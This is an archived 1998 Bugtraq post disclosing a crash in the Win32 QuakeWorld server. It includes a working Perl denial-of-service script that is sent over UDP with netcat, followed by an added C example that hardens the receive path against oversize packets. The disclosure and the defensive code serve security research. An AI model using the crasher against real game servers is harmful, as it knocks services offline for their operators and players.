[8416] in bugtraq

quakeworld/win32 DoS

daemon@ATHENA.MIT.EDU (Paul Boehm)
Wed Nov 4 22:01:42 1998

Date: 	Wed, 4 Nov 1998 16:30:18 +0100
Reply-To: Paul Boehm <pb@INSECURITY.NET>
From: Paul Boehm <pb@INSECURITY.NET>
To: BUGTRAQ@NETSPACE.ORG

--4Ckj6UjgE2iN1+kY
Content-Type: text/plain; charset=us-ascii

The output of the attached perl script, when piped through netcat,
crashes quakeworld for win32. As I don't have any win32 debugging
tools and the problem doesn't occur under Linux, I can't further
investigate this. Zoid (idsoftware) was mailed some weeks ago,
but he didn't look very interested...

cya,
    paul

--
.----------------------------------------------------------------------.
| mail: pb@insecurity.net   :: url: http://paul.boehm.org               |
| irc:  infected            :: pgp: finger pb@insecurity.net | pgp -fka |
 \.....Linux is like a wigwam - no windows, no gates, apache inside..../

--4Ckj6UjgE2iN1+kY
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=qwcrash

#!/usr/bin/perl
# qwsvwin32-crasher by infected@cia.at
#
# usage : ./qwcrash | nc -u host port
# result: qwsv for win32 should exit with: ERROR: NET_GetPacket: Unknown error
# reason: ? (winsock?)
#
#

print chr(255) x 4 . "getchallenge\n";
print chr(255) x 4 . 'connect 28 26914 1960732995 "\noaim\0\msg\1\rate\2500\team\bla\topcolor\3\bottomcolor\11\skin\bla\pmodel\33168\emodel\6967\name\bla"' . "\n";
print "x" x 4400;

--4Ckj6UjgE2iN1+kY--
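
A hardened receive path for this class of crash, as an added example that is not part of the original post or of the QuakeWorld source. It assumes the failure is triggered by a datagram larger than the server's receive buffer (the post leaves the reason open as "winsock?") and drops such a packet instead of treating the receive error as fatal. `get_packet`, `MAX_PACKET` and its 1450-byte value are hypothetical, and POSIX sockets stand in for Winsock.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

#define MAX_PACKET 1450 /* assumed receive buffer size; the post gives none */
enum pkt_status { PKT_OK, PKT_NONE, PKT_OVERSIZE, PKT_ERROR };

/* Read one datagram without blocking. Every outcome goes back to the caller,
 * which logs and drops; no receive error terminates the server. Assumption:
 * the crash is an oversize datagram (Winsock: recvfrom() fails, WSAEMSGSIZE). */
enum pkt_status get_packet(int fd, unsigned char *buf, size_t cap, size_t *len)
{
    struct iovec iov = { buf, cap };
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1 };
    ssize_t n = recvmsg(fd, &msg, MSG_DONTWAIT);

    if (n < 0)
        return (errno == EAGAIN || errno == EWOULDBLOCK || errno == EINTR)
                   ? PKT_NONE : PKT_ERROR;
    if (msg.msg_flags & MSG_TRUNC)
        return PKT_OVERSIZE; /* datagram larger than cap: drop, keep serving */
    *len = (size_t)n;
    return PKT_OK;
}

/* Constructed check: an AF_UNIX datagram pair stands in for the UDP socket.
 * Returns 1 if the oversize datagram is dropped and the next one still reads. */
int demo_oversize_then_normal(void)
{
    static const char challenge[] = "\377\377\377\377getchallenge\n";
    unsigned char big[4400], buf[MAX_PACKET];
    size_t len = 0;
    int sv[2], a, b, c;

    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) != 0) return -1;
    memset(big, 'x', sizeof big); /* same length as the script's final print */
    if (send(sv[0], big, sizeof big, 0) < 0) return -1;
    if (send(sv[0], challenge, sizeof challenge - 1, 0) < 0) return -1;
    a = get_packet(sv[1], buf, sizeof buf, &len); /* oversize, dropped */
    b = get_packet(sv[1], buf, sizeof buf, &len); /* 17-byte request, accepted */
    c = get_packet(sv[1], buf, sizeof buf, &len); /* queue is empty */
    close(sv[0]); close(sv[1]);
    return a == PKT_OVERSIZE && b == PKT_OK && len == 17 && c == PKT_NONE;
}

int main(void) { printf("%d\n", demo_oversize_then_normal()); return 0; }
```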
